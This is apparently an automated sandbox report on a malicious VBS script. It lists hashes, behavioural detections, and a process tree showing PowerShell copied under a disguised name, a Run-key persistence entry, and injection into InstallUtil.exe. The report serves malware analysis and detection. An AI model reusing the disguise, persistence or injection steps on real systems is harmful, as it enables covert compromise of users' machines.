Analysis
  max time kernel: 149s
  max time network: 149s
  platform: windows10-2004_x64
  resource: win10v2004-20240802-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 11/09/2024, 11:53

Static task: static1

Behavioral task: behavioral1
  Sample: 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
  Resource: win10v2004-20240802-en
General
  Target: 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs
  Size: 2.4MB
  MD5: bd7a77c470549aad52435b8b7b785c36
  SHA1: b18ff781161ff4c4bb3e91825053bed3d280ed20
  SHA256: 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371
  SHA512: 7217805ec612b984672c4cd498b0cc3d8e9cc463fab70bef0fdd96276f1fe93425e03777999c266a876161444699bb09738d2b19154b378316af6118cc48445a
  SSDEEP: 49152:xBy7kDIlpNx0KQTuJlDl7QVqXhmfOUJ3bapil:a1o
Malware Config

Signatures

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2592 | 2040 | cmd.exe | 84

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 2028 created 3548 | 2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe | 56

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | WScript.exe

Executes dropped EXE (1 IoC)
  pid | Process
  2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qgeacb = "C:\\Users\\Admin\\AppData\\Roaming\\Qgeacb.vbs" | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 2028 set thread context of 2168 | 2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe | 95

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | InstallUtil.exe

Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | WScript.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid | Process
  2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe (3 events)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
  Token: SeDebugPrivilege | 2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid | Process
  2168 | InstallUtil.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  description | pid | Process | procid_target
  PID 2496 wrote to memory of 2028 | 2496 | WScript.exe | 90 (3 events)
  PID 2028 wrote to memory of 2168 | 2028 | 870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe | 95 (12 events)
Processes

C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 3548

  C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs"
    Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
    PID: 2496

    C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" -enc 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
      Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      PID: 2028

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
    PID: 2168

C:\Windows\system32\cmd.exe
  Command line: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe" /Y
  Signatures: Process spawned unexpected child process
  PID: 2592
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 144B
  MD5: 90275db9e496b3f36153d0be0d66d7c4
  SHA1: 6cf1dc1d7737b742f7ec166654e20e8df6b65b3c
  SHA256: e59b43a5b37c884fc546d5629003f26e96213b1cb4061882e8425272d18827a5
  SHA512: 6f70f7101307acfe1a6476ec235e78804bd102debc59d2ddc3bbbec1a289e8ed061086d804a3194e026be5f91a212900bd7511f91091322a5de14db62bdb6543

  C:\Users\Admin\AppData\Local\Temp\870be08f4682007c1ae7a069a63b8e737dc388b6551ebfb0a96a310d9c996371.vbs.exe
  Filesize: 423KB
  MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
  SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
  SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
  SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82